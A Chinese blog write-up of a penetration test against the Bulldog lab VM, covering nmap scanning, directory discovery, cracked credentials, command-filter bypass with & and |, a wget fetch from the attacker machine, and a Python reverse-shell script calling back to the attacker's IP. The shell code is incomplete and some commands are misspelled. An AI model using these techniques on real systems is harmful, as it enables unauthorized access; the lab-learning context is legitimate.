渗透测试实战-bulldog


环境准备

  • kali 当成攻击机
  • bulldog靶机
    官网下载地址
    Vmware装入即可,成功后是显示这个样子
    在这里插入图片描述
  • kali ip 是:192.168.240.128

信息收集

使用nmap 扫一下靶机处于的网段情况
使用

nmap -sn 只进行主机发现,不进行端口扫描
nmap -Pn 并进行端口扫描

  • 已知对方网段在192.168.240.中
  • 所以nmap扫一下即可
    在这里插入图片描述

漏洞利用

可以看到开放了80端口我们访问一下
在这里插入图片描述

我们就可以利用常规漏洞(sql注入xss等等)
我们首先想到的就是目录扫描了,看看能给我们带来什么惊喜

  • 这里用的是dirsearch

  • 果然惊喜一大堆,首先就能看到后台了
    在这里插入图片描述

  • 万能密码,弱口令无果

在这里插入图片描述
尝试访问dev 发现有东西,查看源码得到
在这里插入图片描述
信息收集了一波尝试访问发现需要账号认证
在这里插入图片描述
首先破解md5,

推荐网站https://www.somd5.com/

经尝试只有最后两个解得出来
在这里插入图片描述
在这里插入图片描述

nick@bulldogindustries.com   bulldog
sarah@bulldogindustries.com  bulldoglover

尝试登入
在这里插入图片描述
登入成功.尝试访问那个shell网站

在这里插入图片描述
发现可以执行命令 ,所以后门要做的就是进一步获取shell

后期利用

思路一

在这里插入图片描述
首先发现直接执行命令会被检测,这里我们利用&绕过

  • 当然也可以用 |

我们尝试用weget 来进行测试

首先启动 service apache2 start
然后监听1234端口让其访问
然后pwd | weget http://192.168.240.128/12.html

操作如图
在这里插入图片描述
发现可以进行访问
当然也可以

python -m SimpleHTTPServer 80 来创建简单的服务访问即可

既然weget 能访问,那末我们直接远程下载python 恶意脚本即可 首先创建 pay.py内容为


import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.240.128",8080))
os.dup2(s.fileno(),0)       
os.dup2(s.fileno(),1)       
os.dup2(s.fileno(),2)       

具体shell 如何创建,可以评论区留言下棋更新其用法
weget 下载后执行即可
在这里插入图片描述
直接弹回shell 成功

后期利用

在home中查看用户
在这里插入图片描述
ls 无回显,ls -a 查看所有
在这里插入图片描述
访问它
在这里插入图片描述
strings 显示文件内容找到密码
在这里插入图片描述

利用 python -c 'import pty;pty.spawn("/etc/bash")'

进行提取操作
在这里插入图片描述
拿到root权限

总结

  • 就是前期的漏洞收集一定要做好,这个靶机漏洞很明显所以渗漏思路很简单,还有很多的拿shell操作没有学,今天学到了 weget 下可以远程下载 shell至于 是python shell不是bash 呢,我试了试是因为,检测到了字符然后失败,所以利用python socket 进行弹shell.
  • 还要继续学本领,
  • 今天就到这里了,明天继续加油
  • 5
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值